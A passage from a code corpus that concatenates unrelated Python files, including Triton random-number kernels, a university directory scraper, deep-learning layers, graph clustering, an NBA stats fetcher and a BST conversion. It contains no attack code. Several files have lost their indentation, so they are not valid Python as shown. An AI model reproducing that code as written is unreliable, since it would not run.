Numerically stable function to convert a random uint32 into a random float uniformly sampled in [0, 1).
"""
x = x.to(tl.int32, bitcast=True)
max = 4.656613e-10 # = 1/MAX_INT = 1/2147483647.
x = tl.where(x < 0, -x - 1, x)
return x * max
@triton.jit
def rand(seed, offset, n_rounds: tl.constexpr = N_ROUNDS_DEFAULT):
"""
Given a :code:`seed` scalar and an :code:`offset` block,
returns a block of random :code:`float32` in :math:`U(0, 1)`
:param seed: The seed for generating random numbers.
    :param offset: The offsets to generate random numbers for.
"""
offset = offset.to(tl.uint32, bitcast=True)
source = randint(seed, offset, n_rounds)
return uint32_to_uniform_float(source)
@triton.jit
def rand4x(seed, offsets, n_rounds: tl.constexpr = N_ROUNDS_DEFAULT):
"""
Given a :code:`seed` scalar and an :code:`offsets` block,
    returns 4 blocks of random :code:`float32` in :math:`U(0, 1)`
:param seed: The seed for generating random numbers.
:param offsets: The offsets to generate random numbers for.
"""
offsets = offsets.to(tl.uint32, bitcast=True)
i1, i2, i3, i4 = randint4x(seed, offsets, n_rounds)
u1 = uint32_to_uniform_float(i1)
u2 = uint32_to_uniform_float(i2)
u3 = uint32_to_uniform_float(i3)
u4 = uint32_to_uniform_float(i4)
return u1, u2, u3, u4
# -------------------
# randn
# -------------------
@triton.jit
def pair_uniform_to_normal(u1, u2):
"""Box-Muller transform"""
u1 = tl.maximum(1.0e-7, u1)
th = 6.283185307179586 * u2
r = tl.sqrt(-2.0 * tl.log(u1))
return r * tl.cos(th), r * tl.sin(th)
@triton.jit
def randn(seed, offset, n_rounds: tl.constexpr = N_ROUNDS_DEFAULT):
"""
Given a :code:`seed` scalar and an :code:`offset` block,
returns a block of random :code:`float32` in :math:`\\mathcal{N}(0, 1)`
:param seed: The seed for generating random numbers.
    :param offset: The offsets to generate random numbers for.
"""
i1, i2, _, _ = randint4x(seed, offset, n_rounds)
u1 = uint32_to_uniform_float(i1)
u2 = uint32_to_uniform_float(i2)
n1, _ = pair_uniform_to_normal(u1, u2)
return n1
@triton.jit
def randn4x(seed, offset, n_rounds: tl.constexpr = N_ROUNDS_DEFAULT):
"""
Given a :code:`seed` scalar and an :code:`offset` block,
    returns 4 blocks of random :code:`float32` in :math:`\\mathcal{N}(0, 1)`
    :param seed: The seed for generating random numbers.
    :param offset: The offsets to generate random numbers for.
"""
u1, u2, u3, u4 = rand4x(seed, offset, n_rounds)
n1, n2 = pair_uniform_to_normal(u1, u2)
n3, n4 = pair_uniform_to_normal(u3, u4)
return n1, n2, n3, n4
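# --- illustrative usage (not part of the original module) ---------------------
# A minimal sketch of seeded dropout built on `rand` above; `x_ptr`, `out_ptr`,
# `p`, `seed` and BLOCK are illustrative assumptions, not part of this module.
@triton.jit
def _example_seeded_dropout(x_ptr, out_ptr, n, p, seed, BLOCK: tl.constexpr):
    offs = tl.program_id(0) * BLOCK + tl.arange(0, BLOCK)
    mask = offs < n
    x = tl.load(x_ptr + offs, mask=mask)
    r = rand(seed, offs)  # one uniform float in [0, 1) per offset
    keep = r > p
    tl.store(out_ptr + offs, tl.where(keep, x / (1 - p), 0.0), mask=mask)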
|
__scraping__/myaccount.umn.edu/main.py | whitmans-max/python-examples | 140 | 117543 |
<reponame>whitmans-max/python-examples
#!/usr/bin/env python3
# date: 2020.02.26
# https://stackoverflow.com/questions/60406035/how-to-scrape-the-details-from-a-website-based-on-the-details-in-spread-sheet
# https://pastebin.com/evjdtpuA
# https://pastebin.com/J1UaYVzt
import selenium.webdriver
def scrape1(name):
url = 'https://myaccount.umn.edu/lookup?SET_INSTITUTION=UMNTC&type=name&campus=a&role=any&CN='
driver = selenium.webdriver.Firefox()
driver.get(url)
driver.find_element_by_xpath('//input[@name="CN"]').send_keys(name)
driver.find_element_by_xpath('//input[@type="submit"]').click()
items = driver.find_elements_by_xpath('//table[@class="result__single-person"]//a')
for item in items:
print(item.text)
def scrape2(name):
url = 'https://myaccount.umn.edu/lookup?SET_INSTITUTION=UMNTC&type=name&campus=a&role=any&CN='
driver = selenium.webdriver.Firefox()
driver.get(url + name.replace(' ', '+'))
items = driver.find_elements_by_xpath('//table[@class="result__single-person"]//a')
for item in items:
print(item.text)
# --- main ---
scrape1("<NAME>")
scrape2("<NAME>")
|
TimeWrapper_JE/venv/Lib/site-packages/setuptools/_distutils/debug.py | JE-Chen/je_old_repo | 207 | 117552 |
<gh_stars>100-1000
import os
# If DISTUTILS_DEBUG is anything other than the empty string, we run in
# debug mode.
DEBUG = os.environ.get('DISTUTILS_DEBUG')
|
src/data/orthofoto/tile_loader.py | grischard/OSMDeepOD | 156 | 117555 |
from src.base.tile import Tile
class TileLoader:
def __init__(self, bbox=None, image_api=None):
self.bbox = bbox
self.image_api = image_api
self.tile = None
def load_tile(self):
image = self.image_api.get_image(self.bbox)
self.tile = Tile(image, self.bbox)
return self.tile
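# --- illustrative usage (not part of the original module) ---------------------
# A minimal sketch, assuming a bbox and an image API object from the surrounding project:
#   loader = TileLoader(bbox=some_bbox, image_api=some_image_api)
#   tile = loader.load_tile()   # fetches the imagery for bbox and wraps it in a Tile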
|
deeppy/expr/nnet/spatial.py | purushothamgowthu/deeppy | 1,170 | 117593 |
<reponame>purushothamgowthu/deeppy
import cudarray as ca
from ...base import ParamMixin
from ...parameter import Parameter
from ..base import Unary
def padding(win_shape, border_mode):
if border_mode == 'valid':
def pad_fun(win_size): return 0
elif border_mode == 'same':
def pad_fun(win_size): return win_size // 2
elif border_mode == 'full':
def pad_fun(win_size): return win_size - 1
else:
raise ValueError('invalid mode: "%s"' % border_mode)
return tuple(pad_fun(win_size) for win_size in win_shape)
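# e.g. padding((5, 5), 'same') -> (2, 2), padding((3, 3), 'full') -> (2, 2),
# and padding((3, 3), 'valid') -> (0, 0)  (illustrative values)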
class Convolution(Unary, ParamMixin):
def __init__(self, n_filters, filter_shape, weights, bias=0.0,
strides=(1, 1), border_mode='valid'):
self.name = 'conv'
self.n_filters = n_filters
self.filter_shape = filter_shape
self.weights = Parameter.from_any(weights)
if bias is not None:
bias = Parameter.from_any(bias)
self.bias = bias
self.padding = padding(filter_shape, border_mode)
self.strides = strides
self.conv_op = ca.nnet.ConvBC01(self.padding, self.strides)
def __call__(self, x):
super(Convolution, self).__call__(x)
self.bpropable = True
return self
@staticmethod
def img_out_shape(img_shape, win_shape, strides, padding):
return tuple((img_size + 2*pad - win_size) // stride + 1
for img_size, win_size, stride, pad
in zip(img_shape, win_shape, strides, padding))
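    # e.g. img_out_shape((32, 32), (3, 3), strides=(1, 1), padding=(1, 1)) -> (32, 32),
    # the usual (size + 2*pad - win) // stride + 1 rule (illustrative values)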
def setup(self):
x_shape = self.x.shape
batch_size, n_channels = x_shape[:2]
self.weights.setup((self.n_filters, n_channels) + self.filter_shape)
if self.bias is not None:
self.bias.setup((1, self.n_filters, 1, 1))
img_shape = self.img_out_shape(x_shape[2:], self.filter_shape,
self.strides, self.padding)
self.shape = (batch_size, self.n_filters) + img_shape
self.array = ca.zeros(self.shape)
self.grad_array = ca.zeros(self.shape)
def fprop(self):
self.conv_op.fprop(self.x.array, self.weights.array,
convout=self.array)
if self.bias is not None:
self.array += self.bias.array
def bprop(self):
self.conv_op.bprop(
self.x.array, self.weights.array, self.grad_array,
filters_d=self.weights.grad_array, imgs_d=self.x.grad_array
)
if self.bias is not None:
ca.sum(ca.sum(self.grad_array, axis=(2, 3), keepdims=True), axis=0,
keepdims=True, out=self.bias.grad_array)
@property
def params(self):
if self.bias is None:
return self.weights,
else:
return self.weights, self.bias
@params.setter
def params(self, params):
if self.bias is None:
self.weights, = params
else:
self.weights, self.bias = params
class BackwardConvolution(Convolution):
def __init__(self, n_filters, filter_shape, weights, bias=0.0,
strides=(2, 2), border_mode='valid'):
super(BackwardConvolution, self).__init__(
n_filters, filter_shape, weights, bias, strides, border_mode
)
self.conv_op = ca.nnet.ConvBC01(self.padding, self.strides)
@staticmethod
def img_out_shape(img_shape, win_shape, strides, padding):
return tuple((img_size + 2*pad - win_size + 1) * stride
for img_size, win_size, stride, pad
in zip(img_shape, win_shape, strides, padding))
def setup(self):
x_shape = self.x.shape
batch_size, n_channels = x_shape[:2]
self.weights.setup((n_channels, self.n_filters) + self.filter_shape)
if self.bias is not None:
self.bias.setup((1, self.n_filters, 1, 1))
img_shape = self.img_out_shape(x_shape[2:], self.filter_shape,
self.strides, self.padding)
self.shape = (batch_size, self.n_filters) + img_shape
self.array = ca.zeros(self.shape)
self.grad_array = ca.zeros(self.shape)
# make sure conv_op is initialized
self.conv_op.fprop(self.grad_array, self.weights.array,
convout=self.x.grad_array)
def fprop(self):
self.conv_op.bprop(
None, self.weights.array, self.x.array,
to_filters=False, imgs_d=self.array
)
if self.bias is not None:
self.array += self.bias.array
def bprop(self):
self.conv_op.bprop(
self.grad_array, self.weights.array, self.x.array,
filters_d=self.weights.grad_array, to_imgs=False
)
self.conv_op.fprop(self.grad_array, self.weights.array,
convout=self.x.grad_array)
if self.bias is not None:
ca.sum(ca.sum(self.grad_array, axis=(2, 3), keepdims=True), axis=0,
keepdims=True, out=self.bias.grad_array)
class Pool(Unary):
def __init__(self, win_shape=(3, 3), method='max', strides=(2, 2),
border_mode='valid'):
pad = padding(win_shape, border_mode)
self.pool_op = ca.nnet.PoolB01(win_shape, pad, strides, method)
self.img_shape = None
def setup(self):
self.shape = self.pool_op.fprop(self.x.array).shape
self.array = ca.zeros(self.shape)
self.grad_array = ca.zeros(self.shape)
def fprop(self):
self.pool_op.fprop(self.x.array, self.array)
def bprop(self):
self.pool_op.bprop(self.x.shape[2:], self.grad_array,
self.x.grad_array)
class Rescale(Unary):
def __init__(self, factor, method):
self.factor = factor
self.method = method
def setup(self):
self.shape = ca.nnet.rescale(self.x.array, self.factor,
self.method).shape
self.array = ca.zeros(self.shape)
self.grad_array = ca.zeros(self.shape)
def fprop(self):
ca.nnet.rescale(self.x.array, self.factor, self.method, self.array)
if self.factor > 1.0 and self.method != 'perforated':
self.array *= 1.0/(self.factor*self.factor)
def bprop(self):
ca.nnet.rescale(self.grad_array, 1./self.factor, self.method,
self.x.grad_array)
|
notebooks/test.py | vishalbelsare/LocalGraphClustering | 106 | 117597 |
<gh_stars>100-1000
from localgraphclustering import *
import time
import numpy as np
# Read graph. This also supports gml and graphml format.
g = GraphLocal('./datasets/senate.edgelist','edgelist',' ')
# Call the global spectral partitioning algorithm.
eig2 = fiedler(g)
# Round the eigenvector
output_sc = sweep_cut(g,eig2)
# Extract the partition for g and store it.
eig2_rounded = output_sc[0]
# Conductance before improvement
print("Conductance before improvement:",g.compute_conductance(eig2_rounded))
# Start calling SimpleLocal
start = time.time()
output_SL_fast = SimpleLocal(g,eig2_rounded)
end = time.time()
print("running time:",str(end-start)+"s")
# Conductance after improvement
print("Conductance after improvement:",g.compute_conductance(output_SL_fast[0]))
output_SL = output_SL_fast[0]
|
models/methods/SwinTrack/modules/encoder/cross_attention_fusion/builder.py | zhangzhengde0225/SwinTrack | 143 | 117600 |
<reponame>zhangzhengde0225/SwinTrack
from .cross_attention_fusion import FeatureFusion, FeatureFusionEncoder
from ....positional_encoding.untied.absolute import Untied2DPositionalEncoder
from ....positional_encoding.untied.relative import generate_2d_relative_positional_encoding_index, \
RelativePosition2DEncoder
def build_cross_attention_based_encoder(config: dict, drop_path_allocator,
dim, num_heads, mlp_ratio, qkv_bias, drop_rate, attn_drop_rate,
z_shape, x_shape):
transformer_config = config['transformer']
    assert not transformer_config['position_embedding']['enabled'] and \
        transformer_config['untied_position_embedding']['absolute']['enabled'] and \
        transformer_config['untied_position_embedding']['relative']['enabled']
encoder_config = transformer_config['encoder']
assert encoder_config['type'] == 'cross_attention_feature_fusion'
num_layers = encoder_config['num_layers']
encoder_layers = []
for index_of_layer in range(num_layers):
encoder_layers.append(
FeatureFusion(dim, num_heads, mlp_ratio, qkv_bias, drop=drop_rate, attn_drop=attn_drop_rate,
drop_path=drop_path_allocator.allocate(),
attn_pos_encoding_only=True)
)
z_abs_encoder = Untied2DPositionalEncoder(dim, num_heads, z_shape[0], z_shape[1])
x_abs_encoder = Untied2DPositionalEncoder(dim, num_heads, x_shape[0], x_shape[1])
z_self_attn_rel_pos_index = generate_2d_relative_positional_encoding_index(z_shape, z_shape)
x_self_attn_rel_pos_index = generate_2d_relative_positional_encoding_index(x_shape, x_shape)
z_x_cross_attn_rel_pos_index = generate_2d_relative_positional_encoding_index(z_shape, x_shape)
x_z_cross_attn_rel_pos_index = generate_2d_relative_positional_encoding_index(x_shape, z_shape)
z_self_attn_rel_pos_bias_table = RelativePosition2DEncoder(num_heads, z_self_attn_rel_pos_index.max() + 1)
x_self_attn_rel_pos_bias_table = RelativePosition2DEncoder(num_heads, x_self_attn_rel_pos_index.max() + 1)
z_x_cross_attn_rel_pos_bias_table = RelativePosition2DEncoder(num_heads, z_x_cross_attn_rel_pos_index.max() + 1)
x_z_cross_attn_rel_pos_bias_table = RelativePosition2DEncoder(num_heads, x_z_cross_attn_rel_pos_index.max() + 1)
return FeatureFusionEncoder(encoder_layers, z_abs_encoder, x_abs_encoder, z_self_attn_rel_pos_index,
x_self_attn_rel_pos_index,
z_x_cross_attn_rel_pos_index, x_z_cross_attn_rel_pos_index,
z_self_attn_rel_pos_bias_table,
x_self_attn_rel_pos_bias_table, z_x_cross_attn_rel_pos_bias_table,
x_z_cross_attn_rel_pos_bias_table)
|
examples/http/http_players.py | timgates42/netius | 107 | 117607 |
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Hive Netius System
# Copyright (c) 2008-2020 Hive Solutions Lda.
#
# This file is part of Hive Netius System.
#
# Hive Netius System is free software: you can redistribute it and/or modify
# it under the terms of the Apache License as published by the Apache
# Foundation, either version 2.0 of the License, or (at your option) any
# later version.
#
# Hive Netius System is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# Apache License for more details.
#
# You should have received a copy of the Apache License along with
# Hive Netius System. If not, see <http://www.apache.org/licenses/>.
__author__ = "<NAME> <<EMAIL>>"
""" The author(s) of the module """
__version__ = "1.0.0"
""" The version of the module """
__revision__ = "$LastChangedRevision$"
""" The revision number of the module """
__date__ = "$LastChangedDate$"
""" The last change date of the module """
__copyright__ = "Copyright (c) 2008-2020 Hive Solutions Lda."
""" The copyright for the module """
__license__ = "Apache License, Version 2.0"
""" The license for the module """
import os
import asyncio
import aiofiles
import aiohttp
import netius
BASE_URL = "http://stats.nba.com/stats"
HEADERS = {
"user-agent": (
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) "
"AppleWebKit/537.36 (KHTML, like Gecko) "
"Chrome/45.0.2454.101 Safari/537.36"
),
"connection": ("keep-alive")
}
async def get_players(player_args, season = "2016-17"):
endpoint = "/commonallplayers"
params = dict(
season = season,
leagueid = "00",
isonlycurrentseason = "1"
)
url = BASE_URL + endpoint
print("Getting all players for season %s ..." % season)
async with aiohttp.ClientSession() as session:
async with session.get(url, headers = HEADERS, params = params) as resp:
data = await resp.json()
player_args.extend(
[(item[0], item[2]) for item in data["resultSets"][0]["rowSet"]])
async def get_player(player_id, player_name):
endpoint = "/commonplayerinfo"
params = dict(playerid = player_id)
url = BASE_URL + endpoint
print("Getting player %s" % player_name)
async with aiohttp.ClientSession() as session:
async with session.get(url, headers = HEADERS, params = params) as resp:
data = await resp.text()
print(data)
async with aiofiles.open(
"players/%s.json" % player_name.replace(" ", "_"), "w"
) as file:
await file.write(data)
loop = netius.get_loop(_compat = True)
os.makedirs("players", exist_ok = True)
player_args = []
loop.run_until_complete(get_players(player_args))
loop.run_until_complete(
asyncio.gather(
*(get_player(*args) for args in player_args)
)
)
loop.close()
|
cpgf/samples/irrlicht/02.quake3map.py | mousepawmedia/libdeps | 187 | 117619 |
def start() :
driverType = irr.driverChoiceConsole();
if driverType == irr.EDT_COUNT :
return 1;
device = irr.createDevice(driverType, irr.dimension2d_u32(640, 480));
if device == None :
return 1;
driver = device.getVideoDriver();
smgr = device.getSceneManager();
device.getFileSystem().addZipFileArchive("../../media/map-20kdm2.pk3");
mesh = smgr.getMesh("20kdm2.bsp");
node = None;
if mesh != None :
node = smgr.addOctreeSceneNode(mesh.getMesh(0), None, -1, 1024);
if node != None :
node.setPosition(irr.vector3df(-1300,-144,-1249));
smgr.addCameraSceneNodeFPS();
device.getCursorControl().setVisible(False);
lastFPS = -1;
while device.run() :
if device.isWindowActive() :
driver.beginScene(True, True, irr.SColor(255,200,200,200));
smgr.drawAll();
driver.endScene();
fps = driver.getFPS();
if lastFPS != fps :
tmp = "cpgf Irrlicht Python Binding Demo - Quake 3 Map example [";
tmp = tmp + driver.getName();
tmp = tmp + "] fps: ";
tmp = tmp + str(fps);
device.setWindowCaption(tmp);
lastFPS = fps;
device.drop();
return 0;
start();
|
metrics/metric_monitor.py | apple/ml-cvnets | 209 | 117622 |
#
# For licensing see accompanying LICENSE file.
# Copyright (C) 2022 Apple Inc. All Rights Reserved.
#
from typing import Any, Optional, Tuple, Union
from torch import Tensor
from utils.tensor_utils import tensor_to_python_float
from .topk_accuracy import top_k_accuracy
from .intersection_over_union import compute_miou_batch
from .psnr import compute_psnr
def metric_monitor(
opts,
pred_label: Any,
target_label: Any,
    loss: Union[Tensor, float],
metric_names: list,
use_distributed: Optional[bool] = False,
grad_norm: Optional = None,
is_evaluation: Optional[bool] = False,
*args,
**kwargs
):
metric_vals = dict()
if "loss" in metric_names:
loss = tensor_to_python_float(loss, is_distributed=use_distributed)
metric_vals["loss"] = loss
if "grad_norm" in metric_names:
if grad_norm is None:
metric_vals["grad_norm"] = 1e-7
else:
grad_norm = tensor_to_python_float(
grad_norm, is_distributed=use_distributed
)
metric_vals["grad_norm"] = grad_norm
    if "top1" in metric_names or "top5" in metric_names:
        # compute both accuracies once so "top5" also works when "top1" is absent
        top_1_acc, top_5_acc = top_k_accuracy(pred_label, target_label, top_k=(1, 5))
        if "top1" in metric_names:
            top_1_acc = tensor_to_python_float(
                top_1_acc, is_distributed=use_distributed
            )
            metric_vals["top1"] = top_1_acc
        if "top5" in metric_names:
            top_5_acc = tensor_to_python_float(
                top_5_acc, is_distributed=use_distributed
            )
            metric_vals["top5"] = top_5_acc
if "iou" in metric_names:
inter, union = compute_miou_batch(prediction=pred_label, target=target_label)
inter = tensor_to_python_float(inter, is_distributed=use_distributed)
union = tensor_to_python_float(union, is_distributed=use_distributed)
metric_vals["iou"] = {"inter": inter, "union": union}
if "psnr" in metric_names:
psnr = compute_psnr(prediction=pred_label, target=target_label)
metric_vals["psnr"] = tensor_to_python_float(
psnr, is_distributed=use_distributed
)
return metric_vals
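# --- illustrative usage (not part of the original module) ---------------------
# A minimal sketch, assuming `opts`, classification logits and integer targets:
#   metrics = metric_monitor(opts, pred_label=logits, target_label=targets, loss=loss,
#                            metric_names=["loss", "top1", "top5"])
#   # -> {"loss": ..., "top1": ..., "top5": ...} as plain Python floats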
|
sendWhatsappMessage.py | systemquant/DeFi_PanCakeSwapBot | 142 | 117627 |
import pywhatkit as py
import keyboard
import time
from datetime import datetime, timedelta
def sendMessage(numbers, message, price):
for number in numbers:
        # schedule two minutes from now; using a timedelta avoids minute overflow at :58/:59
        send_at = datetime.now() + timedelta(minutes=2)
        py.sendwhatmsg(number, "{}: {:.10f}".format(message, price),
                       send_at.hour, send_at.minute)
keyboard.press_and_release('ctrl+w')
time.sleep(1)
keyboard.press_and_release('enter')
time.sleep(1)
|
tests/test_tokenization.py | jayten42/pororo | 1,137 | 117633 |
"""Test Tokenization module"""
import unittest
from pororo import Pororo
class PororoTokenizerTester(unittest.TestCase):
def test_modules(self):
mecab = Pororo(task="tokenize", lang="ko", model="mecab_ko")
mecab_res = mecab("안녕 나는 민이라고 해.")
self.assertIsInstance(mecab_res, list)
bpe = Pororo(task="tokenise", lang="ko", model="bpe32k.ko")
bpe_res = bpe("안녕 나는 민이라고 해.")
self.assertIsInstance(bpe_res, list)
unigram = Pororo(task="tokenization", lang="ko", model="unigram32k.ko")
unigram_res = unigram("안녕 나는 민이라고 해.")
self.assertIsInstance(unigram_res, list)
char = Pororo(task="tokenization", lang="ko", model="char")
char_res = char("안녕 나는 민이라고 해.")
self.assertIsInstance(char_res, list)
jamo = Pororo(task="tokenization", lang="ko", model="jamo")
jamo_res = jamo("안녕 나는 민이라고 해.")
self.assertIsInstance(jamo_res, list)
jpe = Pororo(task="tokenization", lang="ko", model="jpe32k.ko")
jpe_res = jpe("안녕 나는 민이라고 해.")
self.assertIsInstance(jpe_res, list)
mecab_bpe = Pororo(
task="tokenization",
lang="ko",
model="mecab.bpe32k.ko",
)
mecab_bpe_res = mecab_bpe("안녕 나는 민이라고 해.")
self.assertIsInstance(mecab_bpe_res, list)
if __name__ == "__main__":
unittest.main()
|
examples/rl/train/evaluation.py | ONLYA/RoboGrammar | 156 | 117655 |
import numpy as np
import torch
import time
import gym
from a2c_ppo_acktr import utils
from a2c_ppo_acktr.envs import make_vec_envs
from common.common import *
import pyrobotdesign as rd
def evaluate(args, actor_critic, ob_rms, env_name, seed, num_processes, device):
eval_envs = make_vec_envs(env_name, seed + num_processes, num_processes,
None, None, device, True)
vec_norm = utils.get_vec_normalize(eval_envs)
if vec_norm is not None:
vec_norm.eval()
vec_norm.ob_rms = ob_rms
eval_episode_rewards = []
obs = eval_envs.reset()
eval_recurrent_hidden_states = torch.zeros(
num_processes, actor_critic.recurrent_hidden_state_size, device=device)
eval_masks = torch.zeros(num_processes, 1, device=device)
while len(eval_episode_rewards) < args.eval_num:
with torch.no_grad():
_, action, _, eval_recurrent_hidden_states = actor_critic.act(
obs,
eval_recurrent_hidden_states,
eval_masks,
deterministic=True)
        # Observe reward and next obs
obs, _, done, infos = eval_envs.step(action)
eval_masks = torch.tensor(
[[0.0] if done_ else [1.0] for done_ in done],
dtype=torch.float64,
device=device)
for info in infos:
if 'episode' in info.keys():
eval_episode_rewards.append(info['episode']['r'])
eval_envs.close()
print(" Evaluation using {} episodes: mean reward {:.5f}\n".format(
len(eval_episode_rewards), np.mean(eval_episode_rewards)))
def render(render_env, actor_critic, ob_rms, deterministic = False, repeat = False):
# Get robot bounds
lower = np.zeros(3)
upper = np.zeros(3)
render_env.sim.get_robot_world_aabb(render_env.robot_index, lower, upper)
viewer = rd.GLFWViewer()
viewer.camera_params.position = 0.5 * (lower + upper)
viewer.camera_params.yaw = 0.0
viewer.camera_params.pitch = -np.pi / 6
viewer.camera_params.distance = 2.0 * np.linalg.norm(upper - lower)
time_step = render_env.task.time_step * render_env.frame_skip
while True:
total_reward = 0.
sim_time = 0.
render_time_start = time.time()
with torch.no_grad():
ob = render_env.reset()
done = False
episode_length = 0
while not done:
ob = np.clip((ob - ob_rms.mean) / np.sqrt(ob_rms.var + 1e-8), -10.0, 10.0)
_, u, _, _ = actor_critic.act(torch.tensor(ob).unsqueeze(0), None, None, deterministic = deterministic)
u = u.detach().squeeze(dim = 0).numpy()
ob, reward, done, _ = render_env.step(u)
total_reward += reward
episode_length += 1
# render
render_env.sim.get_robot_world_aabb(render_env.robot_index, lower, upper)
target_pos = 0.5 * (lower + upper)
camera_pos = viewer.camera_params.position.copy()
camera_pos += 5.0 * time_step * (target_pos - camera_pos)
viewer.camera_params.position = camera_pos
viewer.update(time_step)
viewer.render(render_env.sim)
sim_time += time_step
render_time_now = time.time()
if render_time_now - render_time_start < sim_time:
time.sleep(sim_time - (render_time_now - render_time_start))
print_info('rendering:')
print_info('length = ', episode_length)
print_info('total reward = ', total_reward)
print_info('avg reward = ', total_reward / (episode_length * render_env.frame_skip))
if not repeat:
break
del viewer
# render each sub-step
def render_full(render_env, actor_critic, ob_rms, deterministic = False, repeat = False):
# Get robot bounds
lower = np.zeros(3)
upper = np.zeros(3)
render_env.sim.get_robot_world_aabb(render_env.robot_index, lower, upper)
viewer = rd.GLFWViewer()
viewer.camera_params.position = 0.5 * (lower + upper)
viewer.camera_params.yaw = 0.0
viewer.camera_params.pitch = -np.pi / 6
viewer.camera_params.distance = 2.0 * np.linalg.norm(upper - lower)
time_step = render_env.task.time_step
control_frequency = render_env.frame_skip
render_env.set_frame_skip(1)
while True:
total_reward = 0.
sim_time = 0.
render_time_start = time.time()
with torch.no_grad():
ob = render_env.reset()
done = False
episode_length = 0
while episode_length < 128 * control_frequency:
if episode_length % control_frequency == 0:
ob = np.clip((ob - ob_rms.mean) / np.sqrt(ob_rms.var + 1e-8), -10.0, 10.0)
_, u, _, _ = actor_critic.act(torch.tensor(ob).unsqueeze(0), None, None, deterministic = deterministic)
u = u.detach().squeeze(dim = 0).numpy()
ob, reward, done, _ = render_env.step(u)
total_reward += reward
episode_length += 1
# render
render_env.sim.get_robot_world_aabb(render_env.robot_index, lower, upper)
target_pos = 0.5 * (lower + upper)
camera_pos = viewer.camera_params.position.copy()
camera_pos += 20.0 * time_step * (target_pos - camera_pos)
sim_time += time_step
render_time_now = time.time()
if render_time_now - render_time_start < sim_time:
time.sleep(sim_time - (render_time_now - render_time_start))
if sim_time + time_step > render_time_now - render_time_start:
viewer.camera_params.position = camera_pos
viewer.update(time_step)
viewer.render(render_env.sim)
print_info('rendering:')
print_info('length = ', episode_length)
print_info('total reward = ', total_reward)
print_info('avg reward = ', total_reward / (episode_length * render_env.frame_skip))
if not repeat:
break
del viewer
|
tracardi/domain/settings.py | bytepl/tracardi | 153 | 117660 |
from typing import Any
from pydantic import BaseModel
from tracardi.domain.enum.yes_no import YesNo
class Settings(BaseModel):
enabled: bool = True
hidden: bool = False
@staticmethod
def as_bool(state: YesNo):
return state.value == state.yes
class SystemSettings(BaseModel):
label: str
value: Any
desc: str
|
maml/apps/symbolic/tests/__init__.py | anooptp/maml | 161 | 117666 |
<reponame>anooptp/maml
"""
Tests for symbolic package.
"""
|
metakernel/magics/get_magic.py | StephanRempel/metakernel | 276 | 117673 |
# Copyright (c) Metakernel Development Team.
# Distributed under the terms of the Modified BSD License.
from metakernel import Magic
class GetMagic(Magic):
def line_get(self, variable):
"""
%get VARIABLE - get a variable from the kernel in a Python-type.
This line magic is used to get a variable.
Examples:
%get x
"""
self.retval = self.kernel.get_variable(variable)
def post_process(self, retval):
return self.retval
def register_magics(kernel):
kernel.register_magics(GetMagic)
|
data_structures/bst/bt_to_bst.py | Inquis1t0r/python-ds | 1,723 | 117687 |
<filename>data_structures/bst/bt_to_bst.py<gh_stars>1000+
class Node:
def __init__(self, val):
self.val = val
self.left = None
self.right = None
def store_inorder(root, inorder):
if root is None:
return
store_inorder(root.left, inorder)
    inorder.append(root.val)
store_inorder(root.right, inorder)
def count_nodes(root):
if root is None:
return 0
return count_nodes(root.left) + count_nodes(root.right) + 1
def array_to_bst(arr, root):
if root is None:
return
array_to_bst(arr, root.left)
    root.val = arr[0]
arr.pop(0)
array_to_bst(arr, root.right)
def bt_to_bst(root):
if root is None:
return
n = count_nodes(root)
arr = []
store_inorder(root, arr)
arr.sort()
array_to_bst(arr, root)
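if __name__ == '__main__':
    # Usage sketch (not part of the original snippet): convert the binary tree
    # 10 -> (2, 7) into a BST in place and print its inorder traversal.
    root = Node(10)
    root.left = Node(2)
    root.right = Node(7)
    bt_to_bst(root)
    result = []
    store_inorder(root, result)
    print(result)  # [2, 7, 10]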
|
yabgp/message/attribute/largecommunity.py
|
mengjunyi/yabgp
| 203 |
117734
|
# Copyright 2015 Cisco Systems, Inc.
# All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import struct
from yabgp.message.attribute import Attribute
from yabgp.message.attribute import AttributeID
from yabgp.message.attribute import AttributeFlag
from yabgp.common import exception as excep
from yabgp.common import constants as bgp_cons
class LargeCommunity(Attribute):
"""
LARGE COMMUNITIES path attribute is an optional
    transitive attribute of variable length. The attribute consists of a
    set of 12-octet values, each of which specifies a community. All
routes with this attribute belong to the communities listed in the
attribute.
The LARGE COMMUNITIES attribute has Type Code 32.
https://tools.ietf.org/html/rfc8092#page-3
"""
ID = AttributeID.LARGE_COMMUNITY
FLAG = AttributeFlag.OPTIONAL + AttributeFlag.TRANSITIVE + AttributeFlag.PARTIAL
@classmethod
def parse(cls, value):
"""
parse BGP large community.
:param value:
"""
large_community = []
if value:
try:
                length = len(value) // 4
value_list = list(struct.unpack('!%di' % length, value))
while value_list:
large_community.append("%s:%s:%s" % (value_list[0], value_list[1], value_list[2]))
value_list = value_list[3:]
except Exception:
raise excep.UpdateMessageError(
sub_error=bgp_cons.ERR_MSG_UPDATE_ATTR_LEN,
data=value)
return large_community
@classmethod
def construct(cls, value):
"""
construct a LARGE COMMUNITY path attribute
:param value:
"""
large_community_hex = b''
for large_community in value:
try:
value = large_community.split(':')
for sub_value in value:
large_community_hex += struct.pack('!I', int(sub_value))
except Exception:
raise excep.UpdateMessageError(
sub_error=bgp_cons.ERR_MSG_UPDATE_ATTR_LEN,
data=value
)
return struct.pack('!B', cls.FLAG) + struct.pack('!B', cls.ID) \
+ struct.pack('!B', len(large_community_hex)) + large_community_hex
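if __name__ == '__main__':
    # Minimal round-trip sketch (not part of yabgp): construct() prepends the
    # flag/type/length header, while parse() expects only the packed
    # 12-octet-per-community value portion, so the 3-byte header is stripped.
    packed = LargeCommunity.construct(value=['65551:1:2'])
    print(LargeCommunity.parse(packed[3:]))  # ['65551:1:2']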
|
test/python/importer/jit_ir/node_import/utils.py
|
burntfalafel/torch-mlir-internal
| 213 |
117743
|
# -*- Python -*-
# This file is licensed under a pytorch-style license
# See LICENSE.pytorch for license information.
